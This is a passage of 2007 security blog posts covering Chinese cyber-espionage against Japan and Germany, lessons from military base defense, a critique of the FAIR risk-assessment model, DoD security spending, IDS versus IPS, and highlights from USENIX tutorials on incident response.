Friday, August 31, 2007

Japan v China

I couldn't make this up. Thanks to SANS Newsbites for catching the article Japan Military Homes, Ship Raided Over Data Leak.

The homes of several serving members of Japan's Maritime Self Defense Force (JMSDF) and a destroyer were raided as part of an investigation into a leak of sensitive military data from a computer, Japan's Kyodo News reported Tuesday.

Officers from the Kanagawa prefectural police force and the JMSDF's own criminal investigations unit are investigating the leak of information related to the Aegis missile defense system, the sea-based Standard Missile-3 interceptor system and the reconnaissance satellite data exchange Link 16 system.

The Aegis leak first came to light in March this year when police were conducting an immigration-related investigation into the Chinese wife of a JMSDF officer. During the search they came across the data, which included the radar and transmission frequencies of the Aegis system. The officer wasn't authorized to be in possession of the data so the investigation was begun.

He apparently came into possession of the data while swapping pornography with another JMSDF officer, according to a previous report in the Yomiuri Shimbun newspaper.


Any guesses which will be the next country to reveal its fight against Chinese intelligence services?

Lessons from the Military

Jay Heiser is a smart guy, but I don't know why he became so anti-military when he wrote Military mindset no longer applicable in our line of work last year. He wrote in part:

The business world should stop looking to the defense community for direction on information security.

I used to believe that the practice of information security owed a huge debt to the military. I couldn't have been more wrong...

The business world doesn't need the defense community to help it develop secure technology, and, whenever it accepts military ideas, it winds up with the wrong agenda...

It's time our profession stops playing war games and gets in touch with its business roots.


I found two responses, Opinion: Military security legacy is one of innovation, integrity and Opinion: The importance of a military mindset, countering Mr. Heiser. I also found poll results showing 77% of respondents answered "absolutely critical" or "somewhat important" when reading the question "How important is a military mindset when planning and executing an enterprise security strategy?"

Well, it's Friday night and you know what that means in the Bejtlich household. That's right, time to watch a new episode of Dogfights. I don't have any insights based on the episode I just watched, but it reminded me of training I received my first summer at Camp USAFA.

One of the exercises we ran involved Air Base Ground Defense. We learned some basic principles and then acted first as attackers and then defenders. It occurred to me that ABGD is in some ways similar to defending digital assets, although we digital security people are not armed. This denies us the capability of truly deterring and incapacitating threats. Attribution is also easier when the enemy is physically present.

Still, I'd like to do my part showing Mr. Heiser what business can learn from the military. Much of corporate America (and Germany, and Japan) seems to be having its lunch eaten by the Chinese dragon, so it's time to take some lessons from people who do security for a living when lives are at stake.

I decided to take a look at DoD Joint Publications and found Joint Tactics, Techniques, and Procedures for Base Defense. Just skimming it I found several very interesting sections. For example, the executive summary includes this:

The general characteristics of defensive operations are:

  1. to understand the enemy;

  2. see the battlefield;

  3. use the defenders’ advantages;

  4. concentrate at critical times and places;

  5. conduct counterreconnaissance and counterattacks;

  6. coordinate critical defense assets;

  7. balance base security with political and legal constraints;

  8. and know the law of war and rules of engagement.


I think digital non-military, non-police forces can do all of these except the counterattack portion of number 5. For that we need the military and police to act, or to have them deputize us. Notice numbers 1 and 2 imply monitoring, and number 4 implies being able to recognize critical times and places via digital situational awareness.

These items are displayed in the following graphic, which expands on number 3:



The document continues:

The primary mission of the base is to support joint force objectives.

In other words, the base does not exist to provide security. The base exists to perform "business functions."

Essential actions of the defense force are to detect, warn, deny, destroy, and delay. Every intelligence and counterintelligence resource available to the base commander should be used to determine enemy capabilities and intentions. The base commander must make the best use of the terrain within the commander’s AO [area of operation].

Again, we cannot destroy the enemy, but police and military can.

This final graphic displays some physical perimeter defense measures.



This graphic nicely displays principles like defense in depth. Notice also the "intrusion detection" system (labeled "sensor") and the "network forensics" system (labeled "video camera"). Visibility is provided by lighting. If you're a Jericho Forum fan, imagine these defenses collapsed around the host or even data.

I plan to take a closer look at this document and the Air Force version, AFI 31-301, Air Base Defense.

Economist on Models

I intended to stay quiet on risk models for a while, but I read the following Economist articles and wanted to note them here for future reference.

From "Statistics and climatology: Gambling on tomorrow":

Climate models have lots of parameters that are represented by numbers... The particular range of values chosen for a parameter is an example of a Bayesian prior assumption, since it is derived from actual experience of how the climate behaves — and may thus be modified in the light of experience. But the way you pick the individual values to plug into the model can cause trouble...

Climate models have hundreds of parameters that might somehow be related in this sort of way. To be sure you are seeing valid results rather than artefacts of the models, you need to take account of all the ways that can happen.

That logistical nightmare is only now being addressed, and its practical consequences have yet to be worked out. But because of their philosophical training in the rigours of Pascal's method, the Bayesian bolt-on does not come easily to scientists. As the old saw has it, garbage in, garbage out. The difficulty comes when you do not know what garbage looks like.
(emphasis added)

This is only a subset of the argument in the article. Note that this piece includes the line "derived from actual experience of how the climate behaves." I do not see the "Bayesian prior assumption[s]" so often cited elsewhere to even be derived from experience, if you take experience to mean something grounded in recent historical evidence instead of opinion. This willingness to rely on arbitrary inputs only aggravates the problems cited by the Economist.

The accompanying piece "Modelling the climate: Tomorrow and tomorrow" further explains some of the problems I've been describing previously.

While some argue about the finer philosophical points of how to improve models of the climate (see article), others just get on with it. Doug Smith and his colleagues at the Hadley Centre, in Exeter, England, are in the second camp and they seem to have stumbled on to what seems, in retrospect, a surprisingly obvious way of doing so. This is to start the model from observed reality.

Until now, when climate modellers began to run one of their models on a computer, they would “seed” it by feeding in a plausible, but invented, set of values for its parameters. Which sets of invented parameter-values to use is a matter of debate. But Dr Smith thought it might not be a bad idea to start, for a change, with sets that had really happened...

[T]he use of such real starting data made a huge improvement to the accuracy of the results. It reproduced what had happened over the courses of the decades in question as much as 50% more accurately than the results of runs based on arbitrary starting conditions.

Hindcasting, as this technique is known, is a recognised way of testing models. The proof of the pudding, though, is in the forecasting, so Dr Smith plugged in the data from two ten-day periods in 2005 (one in March and one in June), pressed the start button and crossed his fingers.
(emphasis added)

This is exactly what I've been saying. Use "observed reality" and not "plausible, but invented" opinions or "arbitrary starting conditions" and I'll be happy to see what the model produces.

Thursday, August 30, 2007

More Thoughts on FAIR

My post Thoughts on FAIR has attracted some attention, but as often the case some readers choose to obscure my point by overlaying their own assumptions. In this post I will try to explain my problems with FAIR in as simplistic a manner as possible.

Imagine if someone proposed the following model for assessing force: F=ma

(Yes, this is Newton's Second Law, and yes, I am using words like "model" and "assess" to reflect the risk assessment modeling problem.)

I could see two problems with using this model to assess force.

  1. Reality check: The model does not reflect reality. In other words, an accurate measurement of mass times an accurate measurement of acceleration does not result in an accurate measurement of force.

  2. Input check: To accurately measure force, the values for m and a must not be arbitrary. Otherwise, the value for F is arbitrary.


With respect to FAIR, I make the following judgments.

  1. Reality check: The jury is out on whether FAIR reflects reality. It certainly might. It might not.

  2. Input check: I have not seen any evidence that FAIR expects or requires anything other than arbitrary inputs. Arbitrary inputs to a model that passes the reality check does not produce anything valuable as far as I am concerned.

    If you personally like feeding your own opinions into a model to see what comes out the other end, have at it. It's nice to play around by making assumptions, seeing the result, and then altering the inputs to suit whatever output you really wanted to see.


One of the previous post commenters mentioned the book Uncertainty, which looks fascinating. If you read the excerpt you'll notice this line:

In the early 1970s what was then the U.S. Atomic Energy Commission (AEC) asked Norman C. Rasmussen, a professor of nuclear engineering at the Massachusetts Institute of Technology, to undertake a quantitative study of the safety of light-water reactors...

Rasmussen assembled a team of roughly sixty people, who undertook to identify and formally describe, in terms of event trees, the various scenarios they believed might lead to major accidents in each of the two reactors studied. Fault trees were developed to estimate the probabilities of the various events.

A combination of historical evidence from the nuclear and other industries, together with expert judgment, were used to construct the probability estimates, most of which were taken to be log-normally distributed.
(emphasis added)

I've seen no commitment to including real evidence in FAIR, and I submit that those who lack evidence will have their so-called "expert judgment" fail due to soccer-goal security. Therefore, they possess neither historical evidence nor really expert judgment. So, even if FAIR meets my reality check, the results are only a feel-good exercise.

So how can I defend the use of this model?

Risk = Vulnerability X Threat X Impact (or Cost)

As I've said before, it is useful for showing the effects on Risk if you change one of the factors, ceteris paribus. This assumes that the model passes the reality check, which I believe it does.

I am not trying to calculate absolute values for Risk when I cite this equation. I am trying to conceptually show how Risk decreases when Threat decreases (ceteris paribus), or how Risk increases as Vulnerability increases (ceteris paribus), and so on.

You could take the same approach with F=ma if you were trying to explain to someone how it would hurt more to be struck by an object whose mass is larger than another object, assuming constant acceleration for each event. I am not trying to calculate F in such a case; I'm only using the model to describe the relationship between the components.

Tuesday, August 28, 2007

DoD Digital Security Spending


I found the article Is IT security getting short shrift? to be a good reference for other large organizations contemplating digital security spending. In addition to the chart above, this text is illuminating:

Despite the growing number of attacks on military networks, securing enough money for information assurance programs is still a hard sell at the Defense Department, former Pentagon officials say.

“It’s been the source of enormous frustration,” Linton Wells said in a recent interview in which he recounted some of the difficulties he faced during his four-year tenure as principal deputy assistant secretary of Defense for networks and information integration...

[C]onvincing senior budget officials from the military services to spend money in that area is a continuing challenge, Wells said.

“What they say is, ‘Look, we’re all short on money for things we want to buy — ships, planes, tanks, whatever. Show me how this $2 million you want to put on this today is going to turn cell C17 from red to yellow to green in 2011,’” Wells said. “And that’s often a hard thing to do in information assurance.”

Wells said officials in charge of putting together the information technology security budget for DOD’s networks need better metrics for measuring return on investment for information assurance programs.

“We have not done a good job of making the case that a dollar spent here is going to lead to a quantifiable increase there,” he said.
(emphasis added)

I saw Dr. Wells speak at Black Hat Federal 2006.

I have three brief points.

First, I think the bold text is the problem. If I'm being asked to spend money to turn a spreadsheet cell different colors, of course I'm going to debate the value of that spending. The problem is that the metrics used in these situations largely don't matter.

Second, I would be interested in knowing how much of the DoD budget funds counter-intelligence activities. The majority of the serious problems DoD faces have a counter-intelligence function. The intent of the adversary's activities are no different now than they were in pre-Internet days. How much has historically been spent on stopping spies?

Third, it is sad to continue to see security treated as a separate function that has to justify its own existence in financial terms. Security does not make any money so it cannot possibly compete against business projects which do. This is not strictly the case in DoD because none of the military makes money, but it is certainly true of civilian industries.

Germany v China

Thanks to the Dark Reading story
China's Premier 'Gravely Concerned' by Hack on Germany
I learned of recent digital economic espionage conducted by China against Germany. I found the most authoritative reference on the event to be published by the magazine that broke the story, which is currently running an article titled Merkel's China Visit Marred by Hacking Allegations:

German Chancellor Angela Merkel was all smiles after meeting Chinese Premier Wen Jiabao on Monday, praising relations between the two countries as open and constructive.

But her visit has been marred by a report in SPIEGEL that a large number of computers in the German chancellery as well as the foreign, economy and research ministries had been infected with Chinese spy software. Germany's domestic intelligence service, the Office for the Protection of the Constitution, discovered the hacking operation in May, the magazine reported in its new edition, published Monday...

The so-called "Trojan" espionage programs were concealed in Microsoft Word documents and PowerPoint files which infected IT installations when opened, SPIEGEL reported. Information was taken from German computers in this way on a daily basis by hackers based in the north-western province of Lanzhou, Canton province and Beijing. German officials believe the hackers were being directed by the People's Liberation Army and that the programs were redirected via computers in South Korea to disguise their origin.

German security officials managed to stop the theft of 160 gigabytes of data which were in the process of being siphoned off German government computers. "But no one knows how much has leaked out," a top official told SPIEGEL.

The hacking operation has triggered fears in Germany that China may also have infiltrated the computer systems of leading German companies, to steal technology secrets and thereby speed up its inexorable economic growth. The domestic intelligence service plans to help businesses hunt for spy programs in their computers.


China's Foreign Ministry spokesperson had this official comment:

Q: German media reported that German government computers were attacked by Chinese hackers. What's your comment?

A: The Chinese Government has always opposed to and forbidden any criminal acts undermining computer systems including hacking. We have explicit laws and regulations in this regard.

Hacking is an international issue and China is also a frequent victim. China has established a sound mechanism of cooperation with many countries in jointly countering internet crimes. China is willing to cooperate with Germany in this regard.


I find it interesting that the Germans are willing to directly confront this problem in public.

Sunday, August 26, 2007

Thoughts on FAIR

You knew I had risk on my mind given my recent post Economist on the Peril of Models. The fact is I just flew to Chicago to teach my last Network Security Operations class, so I took some time to read the Risk Management Insight white paper An Introduction to Factor Analysis of Information Risk (FAIR). I needed to respond to Risk Assessment Is Not Guesswork, so I figured reading the whole FAIR document was a good start. I said in Brothers in Risk that I liked RMI's attempts to bring standardized terms to the profession, so I hope they approach this post with an open mind.

I have some macro issues with FAIR as well as some micro issues. Let me start with the macro issue by asking you a question:

Does breaking down a large problem into small problems, the solutions to which rely upon making guesses, result in solving the large problem more accurately?

If you answer yes, you will like FAIR. If you answer no, you will not like FAIR.

FAIR defines risk as

Risk - the probable frequency and probable magnitude of future loss

That reminded me of

Annual Loss Expectancy (ALE) = Annualized Rate of Occurrence (ARO) X Single Loss Expectancy (SLE)

If you don't agree remove the "annual" terms from the second definition or add them to the FAIR definition.

I have always preferred this equation

Risk = Vulnerability X Threat X Impact (or Cost)

because it is useful for showing the effects on risk if you change one of the factors, ceteris paribus. (Ok, I threw the Latin in there as homage to one of my economics instructors.)

If you consider frequency when estimating threat activity and include countermeasures as a component of vulnerability, you'll notice that Threat X Vulnerability starts looking like ARO. Impact (or Cost) is practically the same as SLE, so the two equations are similar.

FAIR turns its definition into the following.



If you care to click on that diagram, you'll see many small elements that need to be estimated. Specifically, you can follow the Basic Risk Assessment Guide to see these are the steps.

  • Stage 1. Identify scenario components


    • 1. Identify the asset at risk

    • 2. Identify the threat community under consideration


  • Stage 2. Evaluate Loss Event Frequency (LEF)


    • 3. Estimate the probable Threat Event Frequency (TEF)

    • 4. Estimate the Threat Capability (TCap)

    • 5. Estimate Control strength (CS)

    • 6. Derive Vulnerability (Vuln)

    • 7. Derive Loss Event Frequency (LEF)


  • Stage 3. Evaluate Probable Loss Magnitude (PLM)


    • 8. Estimate worst-case loss

    • 9. Estimate probable loss


  • Stage 4. Derive and articulate Risk


    • 10. Derive and articulate Risk



The problem with FAIR is that in every place you see the word "Estimate" you can substitute "Make a guess that's not backed by any objective measurement and which could be challenged by anyone with a different agenda." Because all the derived values are based on those estimates, your assessment of FAIR depends on the answer to the question I asked at the start of this post.

Let's see how this process stands up to some simple scrutiny by reviewing FAIR's Analyzing a Simple Scenario.

A Human Resources (HR) executive within a large bank has his username and password written on a sticky-note stuck to his computer monitor. These authentication credentials allow him to log onto the network and access the HR applications he’s entitled to use...

1. Identify the Asset at Risk: In this case, however, we’ll focus on the credentials, recognizing that their value is inherited from the assets they’re intended to protect.


We start with a physical security risk case. This simplifies the process considerably and actually gives FAIR the best chance it has to reflect reality. Why is that? The answer is that the physical world changes more slowly than the digital world. We don't have to worry about having solid walls being penetrated by a mutant from the X-Men movies or from the state of the credentials suddenly being altered by a patch or configuration change.

Identify the Threat Community: If we examine the nature of the organization (e.g., the industry it’s in, etc.), and the conditions surrounding the asset (e.g., an HR executive’s office), we can begin to parse the overall threat population into communities that might reasonably apply... For this example, let’s focus on the cleaning crew.

That's convenient. The document lists six potential threat communities but decides to only analyze one. Simplification sure makes it easier to proceed with this analysis. It also means the result is so narrowly targeted to be almost worthless, unless we decide to repeat this process for the rest of the threat communities. And this is still only looking at a sticky note.

3. Estimate the probable Threat Event Frequency (TEF): Many people demand reams of hard data before they’re comfortable estimating attack frequency. Unfortunately, because we don’t have much (if any) really useful or credible data for many scenarios, TEF is often ignored altogether. So, in the absence of hard data, what’s left? One answer is to use a qualitative scale, such as Low, Medium, or High.

And, while there’s nothing inherently wrong with a qualitative approach in many circumstances, a quantitative approach provides better clarity and is more useful to most decision-makers – even if it’s imprecise.

For example, I may not have years of empirical data documenting how frequently cleaning crew employees abuse usernames and passwords on sticky-notes, but I can make a reasonable estimate within a set of ranges.

Recognizing that cleaning crews are generally comprised of honest people, that an HR executive’s credentials typically would not be viewed or recognized as especially valuable to them, and that the perceived risk associated with illicit use might be high, then it seems reasonable to estimate a Low TEF using the table below...

Is it possible for a cleaning crew to have an employee with motive, sufficient computing experience to recognize the potential value of these credentials, and with a high enough risk tolerance to try their hand at illicit use? Absolutely! Does it happen? Undoubtedly. Might such a person be on the crew that cleans this office? Sure – it’s possible. Nonetheless, the probable frequency is relatively low.
(emphasis added)

Says who? Has the person making this assessment done any research to determine if inflitrating cleaning crews is a technique used by economic adversaries? If yes, how often does that happen? What is the nature of the crew cleaning this office? Do they perform background checks? Have they been infiltrated before? Are they owned by a competitor? Figuring all of that out is too hard. Let's just supply guess #1: "low."

4. Estimate the Threat Capability (Tcap): Tcap refers to the threat agent’s skill (knowledge & experience) and resources (time & materials) that can be brought to bear against the asset... In this case, all we’re talking about is estimating the skill (in this case, reading ability) and resources (time) the average member of this threat community can use against a password written on a sticky note. It’s reasonable to rate the cleaning crew Tcap as Medium, as compared to the overall threat population.

Why is that? Why not "low" again? These are janitors we're discussing. Guess #2.

5. Estimate the Control Strength (CS): Control strength has to do with an asset’s ability to resist compromise. In our scenario, because the credentials are in plain sight and in plain text, the CS is Very Low. If they were written down, but encrypted, the CS would be different – probably much higher.

It is easy to accept guess #3 because we are dealing with a physical security scenario. It's simple for any person to understand that a sticky note in plain site has zero controls applied against it, so the (nonexistent) "controls" are worthless. But what about that new Web application firewall? Or you anti-virus software? Or any other technical control? Good luck assessing their effectiveness in the face of attacks that evolve on a weekly basis.

6. Derive Vulnerability (Vuln)

This value is derived using a chart that balances Tcap vs Control Strength. Since it is based on two guesses, one could decide if it is more or less accurate than estimated the vulnerability directly.

7. Derive Loss Event Frequency (LEF)

This value is derived using a chart that balances TEF vs Vulnerability. We derived vulnerability in the previous step and estimated TEF in step 3.

8. Estimate worst-case loss: Within this scenario, three potential threat actions stand out as having significant loss potential – misuse, disclosure, and destruction... For this exercise, we’ll select disclosure as our worst-case threat action.

This step considers Productivity, Response, Replacement, Fine/Judgments, Competitve Advantage, and Reputation, with Threat Actions including Access, Modification, Disclosure, and Denial of Access. Enter guess #4.

9. Estimate probable loss magnitude (PLM): The first step in estimating PLM is to determine which threat action is most likely. Remember; actions are driven by motive, and the most common motive for illicit action is financial gain. Given this threat community, the type of asset (personal information), and the available threat actions, it’s reasonable to select Misuse as the most likely action – e.g., for identity theft. Our next step is to estimate the most likely loss magnitude resulting from Misuse for each loss form.

Again, says who? Was identity theft chosen because it's popular in the news? My choice for guess #5 could be something completely different.

10. Derive and Articulate Risk: [R]isk is simply derived from LEF and PLM. The question is whether to articulate risk qualitatively using a matrix like the one below, or articulate risk as LEF, PLM, and worst-case.

The final risk rating is another derived value, based on previous estimates.

The FAIR author tries to head off critiques like this blog with the following section:

It’s natural, though, for people to accept change at different speeds. Some of us hold our beliefs very firmly, and it can be difficult and uncomfortable to adopt a new approach. Ultimately, not everyone is going to agree with the principles or methods that underlie FAIR. A few have called it nonsense. Others appear to feel threatened by it.

Apparently I'm resistant to "change" and "threatened" because I firmly hold on to "beliefs." I'm afraid that is what I will have to do when frameworks like this are founded upon someone's opinion at each stage of the decision-making process.

The FAIR document continues:

Their concerns tend to revolve around one or more of the following issues:

The absence of hard data. There’s no question that an abundance of good data would be useful. Unfortunately, that’s not our current reality. Consequently, we need to find another way to approach the problem, and FAIR is one solution.


I think I just read that the author admits FAIR is not based on "good data," and since we don't have data, we should just "find another way," like FAIR.

The lack of precision. Here again, precision is nice when it’s achievable, but it’s not realistic within this problem space. Reality is just too complex... FAIR represents an attempt to gain far better accuracy, while recognizing that the fundamental nature of the problem doesn’t allow for a high degree of precision.

The author admits that FAIR is not precise. How can it even be accurate when the derived values are all based on subjective estimates anyway?

Some people just don’t like change – particularly change as profound as this represents.

I fail to see why FAIR is considered profound. Is the answer because the process has been broken into five estimates, from which several other values are derived? Why is this any better than articles like How to Conduct a Risk Analysis or Risk Analysis Tools: A Primer or Risk Assessment and Threat Identification?

I'm sure this isn't the last word on this issue, but I need to rest before teaching tomorrow. Thank you for staying with me if you read the whole post. Obviously if I'm not a fan of FAIR I should propose an alternative. In Risk-Based Security is the Emperor's New Clothes I cited Donn Parker, who is probably the devil to FAIR advocates. If the question is how to make security decisions by assessing digital risk, I will put together thoughts on that for a post (hopefully this week).

Incidentally, the fact that I am not a fan of FAIR doesn't mean I think the authors have wasted their time. I appreciate their attempt to bring rigor to this process. I also think the questions they ask and the elements they consider are important. However, I think the ability to insert whatever value one likes into the five estimations fatally wounds the process.

This is the bottom line for me: FAIR advocates claim their output is superior due to their framework. How can a framework that relies on arbitrary inputs produce non-arbitrary output? And what makes FAIR so valuable anyway -- has the result been tested against any other methods?

Economist on the Peril of Models

Anyone who has been watching financial television stations in the US has seen commentary on the state of our markets with respect to subprime mortgages. I'd like to cite the 21 July 2007 issue of the Economist to make a point that resonates with digital security.

Both [Bear Stearns] funds had invested heavily in securities backed by subprime mortgages... On July 17th it admitted that there “is effectively no value left” in one of the funds, and “very little value left” in the other.

Such brutal clarity is, however, a rarity in the world of complex derivatives. Investors may now know what the two Bear Stearns funds are worth. But accountants are still unsure how to put a value on the instruments that got them into trouble.


This reminds me of a data breach -- instant clarity.

Traditionally, a company's accounts would record the value of an asset at its historic cost (ie, the price the company paid for it). Under so-called “fair value” accounting, however, book-keepers can now record the value of an asset at its market price (ie, the price the company could get for it).

But many complex derivatives, such as mortgage-backed securities, do not trade smoothly and frequently in arm's length markets. This makes it impossible for book-keepers to “mark” them to market. Instead they resort to “mark-to-model” accounting, entering values based on the output of a computer.


Note the reference to "complex"[ity] and book-keepers basing their decisions on models created by other people who make assumptions. Is this starting to sound like risk analysis to you, too?

Unfortunately, the market does not always resemble the model... Models are supposed to show the price an asset would fetch in a sale. But in an illiquid market, a big sale can itself drive down prices. This can sometimes create a sizeable difference between “mark-to-model” valuations and true market prices.

That is not the only problem with fair-value accounting. According to Richard Herring, a finance professor at the Wharton School, “models are easy to manipulate”...

Unfortunately, the alternatives to fair-value accounting can be worse. Historic cost may be harder to manipulate than the results of a model. But as Bob Herz, chairman of America's Financial Accounting Standards Board, points out, it too is “replete with all sorts of guesses”, such as depreciation rates...


"Models are easy to manipulate" and alternatives are also "replete with all sorts of guesses." This sounds exactly like risk analysis now.

Fair value is perhaps most worrying for auditors, who are often blamed for faulty accounts. Faced with murky models, the best they can do is examine assumptions and ensure disclosure.

This means that the role of the auditor becomes that of an outside expert who makes a new set of subjective decisions, perhaps challenging the assumptions of those who made subjective decisions when creating their model. The auditor's advantage, however, is that he/she has insight into the workings of many similar companies, and could compare "best practices" against the specific company being audited.

Incidentally, I would love to know how the "CISO of a major Wall Street bank" who criticized Dan Geer as mentioned in Are the Questions Sound? feels now about his precious financial models. Somehow I doubt his bonus will be as big as it was last year, if his company is even solvent by year's end.

Thursday, August 23, 2007

Experts: IDS is here to stay

Imagine my surprise when I read Experts: IDS is here to stay:

Conventional wisdom once had it that intrusion prevention systems (IPS) would eliminate the need for intrusion defense systems (IDS). But with threats getting worse by the day and IT pros needing every weapon they can find, the IDS is alive and well.

"IPS threatened to hurt the IDS market but IDS is better equipped to inspect malware," said Chris Liebert, a security analyst with Boston-based Yankee Group Research Inc. "IPS specializes in blocking, so each still have their own uses, and that's why IDS is still around."

IDS is now part of a larger intrusion defense arsenal that includes vulnerability management and access control technology. In fact, one analyst believes standalone IDS products will still be in demand five years from now while IPS technology will likely be folded in firewall products.

"In the long term, I do not think IPS devices will remain as separate products," said Eric Maiwald, a senior security analyst for Midvale, Utah-based Burton Group. "We see this happening already. All of the major firewall vendors offer some amount of IPS functionality in their products. At the same time, there is much firewall-like capability in the IPS products."

IDS products will probably remain as separate devices because of the need to monitor happenings on a network and monitor actions of other policy enforcement points, he said.
(emphasis added)

Wow, imagine that. Anyone who's read my books or this blog for any amount of time knows I've advocated this position for years. What's an "IPS" anyway? It's a filtering device, aka "firewall." What's an "IDS"? It's an attack or incident indication system. The two functions are completely different and should be separate. It's too late for me to say any more now, but I wanted to note this article before I forget I read it.

Tuesday, August 21, 2007

What Hackers Learn that the Rest of Us Don't

I read a great article in the July/August 2007 IEEE Security and Privacy magazine titled "What Hackers Learn that the Rest of Us Don't" by Sergey Bratus. He contrasts developers and academic programs with what "hackers" do. For example:

  • Developers are under pressue to follow standard solutions, or the path of least resistance to "just making it work."

  • Developers tend to be implicity trained away from exploring underlying APIs because the extra time investment rarely pays off.

  • Developers often receive a limited view of the API, with few or hardly any details about its implementation.

  • Developers are de facto trained to ignore or avoid infrequent border cases and might not understand their effects.

  • Developers might receive explicit directions to ignore specific problems as being in other developers' domains.

  • Developers often lack tools for examining the full state of the system, let alone changing it outside of the limited API.


I really resonated with this statement:

In a typical academic setting... an ever-increasing number of topics limits the time the students and teachers can allocate for any specific one.

My comment: in contrast, attackers obsess over minute, specific aspects of a target, which ultimately allows them to beat defenders.

Let's contrast developers with "hackers."

  • Hackers tend to treat special and border cases of standards as essential and invest significant time in reading the appropriate documentation.

  • Hackers insist on understanding the underlying API's implementation and exploring it to confirm the documentation's claims.

  • Hackers second-guess the implementer's logic.

  • Hackers reflect on and explore the effects of deviating from standard tutorials.

  • Hackers insist on tools that let them examine the full state of the system across interface layers and modify this state, bypassing the standard development API. If such tools no not exist, developing them becomes a top priority... Interest in the internal workings of various programming language mechanisms is characteristic of the hacker approach.


Let's contrast these hacker characteristics with this "Hot Jobs" column I found in CIO Magaine:

Hot Jobs: Windows Administrator

Job Description: A network administrator who is primarily concerned with software and whose responsibilities include security, implementing network policy, managing user access and network troubleshooting, as well as designing, installing, configuring, administering, and fine-tuning Windows operating systems and components across an organization. Some career experts say the evolution of IT’s business role makes this job a possible career path to CIO.
(emphasis added)

Stopped laughing yet? It gets better:

Desired Skills: Knowledge of Windows Server 2003, Microsoft Exchange, domain and configuration controllers, global catalogs, LDAP (Lightweight Directory Access Protocol) and Active Directory. Minimum education is two-year degree in computer science; general business degree with software training also valuable.

This is an entry level position that requires a two year CS degree... or a business degree? This is mentioned elsewhere:

This is a job where an employer can bring in people with a basic degree in computer science or a degree in business with a computer background and grow their own to a greater extent than some other areas. (emphasis added)

I realize this is CIO Magaine, advocate of the multitalented specialist, but please.

In one corner, hacker. In the other, person with "degree in business with a computer background." Who is going to win here? If I'm going to hire a Windows administrator, I don't care if he/she has a degree, let alone a business degree. I want a person who can administrator Windows.

This "business focus" is getting way out of hand. CIO, absolutely. CISO, yes. Directors, to some degree. Front-line administrators? Forget it. I want technical domain knowledge. Why do I not see financial people being told to get CS degrees with a financial background? After all, they use computers?

Abe Singer Highlights from USENIX Class

I didn't get to attend Abe Singer's talk Incident Response either, but again I managed to get a copy of his slides. They confirmed what I planned to do with my new company CIRT (fortunately), but I wanted to highlight some elements that I hadn't given much thought until I saw them in Abe's slides.

Abe pointed out that it's important to have incident response policies in place prior to an incident. I had always thought in terms of a plan, tools, and team, but not policies. Let me list a few items to explain.

Using language Abe secured for his university as a template, I plan to try to gain approval for something like this as a blanket incident detection and response policy at my company:

The Director of Incident Response and authorized designees have the authority to take actions necessary to contain, detect, and respond to computer incidents involving company assets.

These actions will be consistent with company policies and applicable laws.


Please note the original language said "prevent" instead of "contain," but my company has a separate security services arm. "Contain," as in "limit the damage," is more appropriate for my team's scope.

Abe also recommends explicit policies for the following:

  • Monitoring

  • Data collection and retention (I would add destruction too)

  • Node blocking and disconnection

  • Account suspension

  • Password changes

  • Reinstallation

  • Data sharing


Abe's point is that pre-coordination is essential to giving the CIRT the ability to rapidly execute its response and containment mission during an incident. Signing these policies also sets expectations for the businesses as CIRT customers.

Marcus Ranum Highlights from USENIX Class

Because I was teaching at USENIX Security this month I didn't get to attend Marcus Ranum's tutorial They Really Are Out to Get You: How to Think About Computer Security. I did manage to read a copy of Marcus' slides.

Because he is one of my Three Wise Men of digital security, I thought I would share some of my favorite excerpts. Some of the material paraphrases his slides to improve readability here.

  • Marcus asked how can one make decisions when likelihood of attack, attack consequences, target value, and countermeasure cost are not well understood. His answer helps explain why so many digital security people quote Sun Tzu:

    The art of war is a problem domain in which successful practitioners have to make critical decisions in the face of similar intangibles.

    I would add that malicious adversaries are also present in war, but not present in certain other scenarios misapplied to security (like car analogies) where intelligent adversaries aren't present.

  • Marcus continues this thought by contrasting "The Warrior vs The Quant":

    Statistics and demographics (i.e., insurance industry analysis of automobile driver performance by group) [fails in digital security] because there is no enemy perturbing the actuarial data... and "perturbing your likelihoods" is what an enemy does! It's "innovation in attack or defense. (emphasis added)

  • Marcus offers two definitions for security which I may quote in the future:

    A system is secure when it behaves as expected; no less and certainly no more.

    A system is secure when the amount of trust we place in it matches its trustworthiness.

  • Marcus debunks the de-perimeterization movement by explaining that a perimeter isn't just a security tool:

    A perimeter is a complexity management tool.

    In other words, a perimeter is a place where one makes a stand regarding what is and what is not allowed. I've also called that a channel reduction tool.

  • Here's an incredible insight regarding the many "advanced" inspection and filtering devices that are supposed to be adding "security" by "understanding" more about the network and making blocking decisions:

    At a certain point the complexity [of the firewall/filter] makes you just as likely to be insecure as the original application.

    He says you're replacing "known bugs" (in the app) with "unknown bugs" (in the "prevention" device).

  • I love this point:

    Insiders and counter-intelligence: What to do about insider threat?

    • Against professionals: lose

    • Against idiots: IDS (Idiot Detection System) works; detect stupidity in action


    This is so true. I'd extend the "idiot" paradigm further by adding EDS (Eee-diot Detection System). (Cue "Stimpy, you eee-diot!" if you need pronunciation help here.)

  • Finally, Marcus slams the idea that one can use an equation to quantify risk. He calls "Risk = Threat X Vulnerability X Asset Value" one wild guess times another wild guess times another wild guess. I agree with this but I would say the concept of separating out those variables helps one understand how Risk changes as one variable changes with the others held constant.

    Marcus also offers two approaches to dealing with risk:


    1. Think of all possible disasters, rank by likelihood, prepare for Top 10. (9/11 showed this doesn't work.

    2. Build nimble response teams and command/control structures for fast and effective reaction to threats as they materialize.


    Regarding number one, Marcus obviously thinks that is a waste of time. However, one could argue that if policymakers had paid attention to the intelligence that was available and prepared, the situation could have been different. That's where threat intelligence on capabilities and intentions and attack patterns can be helpful for modeling attacks.

    Regarding number two, I am so pleased to read this. It's why I'm building a CIRT at my new job. This comment also resonates with something Gadi Evron said during his talk on the "Estonia Cyberwar":

    No one is judged anymore by how they prevent incidents. Everyone gets hacked. Instead, organizations are judged by how they detect, respond, and recover.

Thursday, August 16, 2007

Breach Pain

Several stories involving companies victimized by intruders came to light at the same time. It's important to remember not to blame the victim, like the fool editor at Slashdot implied by writing Contractor Folds After Causing Breaches. The company in question, Verus Inc., didn't "cause breaches" -- it suffered them. Some bad guy stealing data caused the breaches. Read Medical IT Contractor Folds After Breaches at Dark Reading for the details.

New details on TJX came to light this week in stories like TJ Maxx Breach Costs Soar by Factor of 10 (Company had to absorb $118M of losses in Q2 alone) and The TJX Effect. The second article says this:

